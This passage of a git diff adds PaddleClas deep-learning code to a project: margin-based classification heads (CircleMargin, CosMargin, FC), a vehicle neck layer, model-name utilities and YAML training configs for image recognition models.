        one_hot = paddle.squeeze(one_hot, axis=[1])
        # Mix margined logits (target class) with plain logits (the rest).
        output = paddle.multiply(one_hot, phi) + paddle.multiply(
            (1.0 - one_hot), cos)
        output = output * self.scale
        return output

    def _paddle_where_more_than(self, target, limit, x, y):
        # Elementwise select: x where target > limit, else y.
        mask = paddle.cast(x=(target > limit), dtype='float32')
        output = paddle.multiply(mask, x) + paddle.multiply((1.0 - mask), y)
        return output
diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py
new file mode 100644
index 0000000..d1bce83
--- /dev/null
+++
b/Smart_container/PaddleClas/ppcls/arch/gears/circlemargin.py
@@ -0,0 +1,59 @@
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import math
import paddle
import paddle.nn as nn
import paddle.nn.functional as F


class CircleMargin(nn.Layer):
    """Circle-margin classification head: logits are re-weighted with
    per-element adaptive factors (alpha_p / alpha_n) around the margins
    delta_p / delta_n, then scaled."""

    def __init__(self, embedding_size, class_num, margin, scale):
        super(CircleMargin, self).__init__()
        self.scale = scale
        self.margin = margin
        self.embedding_size = embedding_size
        self.class_num = class_num

        self.weight = self.create_parameter(
            shape=[self.embedding_size, self.class_num],
            is_bias=False,
            default_initializer=paddle.nn.initializer.XavierNormal())

    def forward(self, input, label):
        # Normalise features and weights so logits are cosine similarities.
        feat_norm = paddle.sqrt(
            paddle.sum(paddle.square(input), axis=1, keepdim=True))
        input = paddle.divide(input, feat_norm)

        weight_norm = paddle.sqrt(
            paddle.sum(paddle.square(self.weight), axis=0, keepdim=True))
        weight = paddle.divide(self.weight, weight_norm)

        logits = paddle.matmul(input, weight)
        # Inference path: raw cosine logits.
        if not self.training or label is None:
            return logits

        # Adaptive weights; detach() keeps them out of the gradient.
        alpha_p = paddle.clip(-logits.detach() + 1 + self.margin, min=0.)
        alpha_n = paddle.clip(logits.detach() + self.margin, min=0.)
        delta_p = 1 - self.margin
        delta_n = self.margin

        m_hot = F.one_hot(label.reshape([-1]), num_classes=logits.shape[1])

        logits_p = alpha_p * (logits - delta_p)
        logits_n = alpha_n * (logits - delta_n)
        # Positive (target-class) logits where m_hot==1, negative elsewhere.
        pre_logits = logits_p * m_hot + logits_n * (1 - m_hot)
        pre_logits = self.scale * pre_logits

        return pre_logits
diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py b/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py
new file mode 100644
index 0000000..578b64c
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/gears/cosmargin.py
@@ -0,0 +1,55 @@
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
+ +import paddle +import math +import paddle.nn as nn + + +class CosMargin(paddle.nn.Layer): + def __init__(self, embedding_size, class_num, margin=0.35, scale=64.0): + super(CosMargin, self).__init__() + self.scale = scale + self.margin = margin + self.embedding_size = embedding_size + self.class_num = class_num + + self.weight = self.create_parameter( + shape=[self.embedding_size, self.class_num], + is_bias=False, + default_initializer=paddle.nn.initializer.XavierNormal()) + + def forward(self, input, label): + label.stop_gradient = True + + input_norm = paddle.sqrt( + paddle.sum(paddle.square(input), axis=1, keepdim=True)) + input = paddle.divide(input, input_norm) + + weight_norm = paddle.sqrt( + paddle.sum(paddle.square(self.weight), axis=0, keepdim=True)) + weight = paddle.divide(self.weight, weight_norm) + + cos = paddle.matmul(input, weight) + if not self.training or label is None: + return cos + + cos_m = cos - self.margin + + one_hot = paddle.nn.functional.one_hot(label, self.class_num) + one_hot = paddle.squeeze(one_hot, axis=[1]) + output = paddle.multiply(one_hot, cos_m) + paddle.multiply( + (1.0 - one_hot), cos) + output = output * self.scale + return output diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/fc.py b/Smart_container/PaddleClas/ppcls/arch/gears/fc.py new file mode 100644 index 0000000..b324741 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/fc.py @@ -0,0 +1,35 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import paddle +import paddle.nn as nn + + +class FC(nn.Layer): + def __init__(self, embedding_size, class_num): + super(FC, self).__init__() + self.embedding_size = embedding_size + self.class_num = class_num + weight_attr = paddle.ParamAttr( + initializer=paddle.nn.initializer.XavierNormal()) + self.fc = paddle.nn.Linear( + self.embedding_size, self.class_num, weight_attr=weight_attr) + + def forward(self, input, label=None): + out = self.fc(input) + return out diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py b/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py new file mode 100644 index 0000000..7d11e57 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/identity_head.py @@ -0,0 +1,9 @@ +from paddle import nn + + +class IdentityHead(nn.Layer): + def __init__(self): + super(IdentityHead, self).__init__() + + def forward(self, x, label=None): + return {"features": x, "logits": None} diff --git a/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py b/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py new file mode 100644 index 0000000..05f4e33 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/gears/vehicle_neck.py @@ -0,0 +1,52 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn + + +class VehicleNeck(nn.Layer): + def __init__(self, + in_channels, + out_channels, + kernel_size=1, + stride=1, + padding=0, + dilation=1, + groups=1, + padding_mode='zeros', + weight_attr=None, + bias_attr=None, + data_format='NCHW'): + super().__init__() + self.conv = nn.Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + dilation=dilation, + groups=groups, + padding_mode=padding_mode, + weight_attr=weight_attr, + bias_attr=weight_attr, + data_format=data_format) + self.flatten = nn.Flatten() + + def forward(self, x): + x = self.conv(x) + x = self.flatten(x) + return x diff --git a/Smart_container/PaddleClas/ppcls/arch/utils.py b/Smart_container/PaddleClas/ppcls/arch/utils.py new file mode 100644 index 0000000..308475d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/utils.py @@ -0,0 +1,53 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import six +import types +from difflib import SequenceMatcher + +from . 
import backbone + + +def get_architectures(): + """ + get all of model architectures + """ + names = [] + for k, v in backbone.__dict__.items(): + if isinstance(v, (types.FunctionType, six.class_types)): + names.append(k) + return names + + +def get_blacklist_model_in_static_mode(): + from ppcls.arch.backbone import distilled_vision_transformer + from ppcls.arch.backbone import vision_transformer + blacklist = distilled_vision_transformer.__all__ + vision_transformer.__all__ + return blacklist + + +def similar_architectures(name='', names=[], thresh=0.1, topk=10): + """ + inferred similar architectures + """ + scores = [] + for idx, n in enumerate(names): + if n.startswith('__'): + continue + score = SequenceMatcher(None, n.lower(), name.lower()).quick_ratio() + if score > thresh: + scores.append((idx, score)) + scores.sort(key=lambda x: x[1], reverse=True) + similar_names = [names[s[0]] for s in scores[:min(topk, len(scores))]] + return similar_names diff --git a/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml b/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml new file mode 100644 index 0000000..69265ec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/Cartoonface/ResNet50_icartoon.yaml @@ -0,0 +1,149 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_mode: "retrieval" + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + image_shape: [3, 224, 224] + infer_imgs: + save_inference_dir: "./inference" + feature_normalize: True + +Arch: + name: "RecModel" + Backbone: + name: "ResNet50" + pretrained: True + BackboneStopLayer: + name: "flatten_0" + output_dim: 2048 + Head: + name: "FC" + class_num: 5013 + embedding_size: 2048 + # margin: 0.5 + # scale: 80 + infer_output_key: "features" + infer_add_softmax: "false" + +Loss: + Train: + - CELoss: + weight: 1.0 + # - 
TripletLoss: + # margin: 0.1 + # weight: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + +DataLoader: + Train: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + #num_instances: 2 + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + + Gallery: + dataset: + name: ICartoonDataset + image_root: "./dataset/iCartoonFace" + cls_label_path: "./dataset/iCartoonFace/gallery.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - 
Recallk: + topk: [1] diff --git a/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml b/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml new file mode 100644 index 0000000..967673f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/GeneralRecognition/GeneralRecognition_PPLCNet_x2_5.yaml @@ -0,0 +1,148 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + eval_mode: retrieval + use_dali: False + to_static: False + +# model architecture +Arch: + name: RecModel + infer_output_key: features + infer_add_softmax: False + + Backbone: + name: PPLCNet_x2_5 + pretrained: True + use_ssld: True + BackboneStopLayer: + name: flatten_0 + Neck: + name: FC + embedding_size: 1280 + class_num: 512 + Head: + name: ArcMargin + embedding_size: 512 + class_num: 185341 + margin: 0.2 + scale: 30 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ + cls_label_path: ./dataset/train_reg_all_data.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + 
use_shared_memory: True + + Eval: + Query: + dataset: + name: VeriWild + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: VeriWild + image_root: ./dataset/Aliproduct/ + cls_label_path: ./dataset/Aliproduct/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml new file mode 100644 index 0000000..1df2cbd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/AlexNet/AlexNet.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: AlexNet + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + decay_epochs: [30, 60, 90] + 
values: [0.01, 0.001, 0.0001, 0.00001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml new file mode 100644 index 0000000..d808afe --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102.yaml @@ -0,0 +1,130 @@ +# 
global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + 
resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml new file mode 100644 index 0000000..10a8375 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102x + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: 
ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml new file mode 100644 index 0000000..f95279b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA102x2.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA102x2 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + 
regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml new file mode 100644 index 0000000..dd1d4a2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA169.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null 
+ pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA169 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - 
NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml new file mode 100644 index 0000000..4051e36 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA34.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA34 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 